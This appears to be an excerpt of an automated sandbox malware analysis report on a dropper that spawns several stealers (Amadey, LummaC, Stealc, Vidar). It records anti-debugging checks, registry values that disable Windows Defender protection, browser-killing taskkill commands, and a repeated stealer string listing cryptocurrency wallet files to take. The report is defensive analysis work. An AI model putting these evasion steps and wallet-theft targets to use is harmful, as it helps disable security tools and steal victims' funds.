Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D90328 rdtsc 14_2_04D90328
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C535FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C535FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Contains functionality to read the PEB
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0054652B mov eax, dword ptr fs:[00000030h] 14_2_0054652B
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0054A302 mov eax, dword ptr fs:[00000030h] 14_2_0054A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D6A302 mov eax, dword ptr fs:[00000030h] 15_2_00D6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D6652B mov eax, dword ptr fs:[00000030h] 15_2_00D6652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D6A302 mov eax, dword ptr fs:[00000030h] 16_2_00D6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D6652B mov eax, dword ptr fs:[00000030h] 16_2_00D6652B
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C50B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C50B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe" Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: JKECGDBFCB.exe, 0000000E.00000002.2625650832.0000000000753000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000F.00000002.2650885855.0000000000F73000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000010.00000002.2658172826.0000000000F73000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: nProgram Manager
Source: feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: 4Program Manager
Source: 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: vProgram Manager
Source: firefox.exe, 00000023.00000002.3232053032.0000000CD79FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: file.exe, file.exe, 00000000.00000002.2594058159.00000000005BD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: tProgram Manager
Source: feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: $WProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B341 cpuid 0_2_6C50B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4D35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4D35A0
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: feb3d39b6a.exe, 00000013.00000003.3078764009.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3078878997.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3310416758.0000000005674000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3286619408.0000000005672000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 14.2.JKECGDBFCB.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2623989684.0000000000511000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2649996256.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2653499661.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3319241005.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 0d957dbf73.exe PID: 6256, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3252381859.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3244939214.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3154801184.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2971078627.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2048185134.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2593553859.00000000001E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3069078994.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2604363979.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
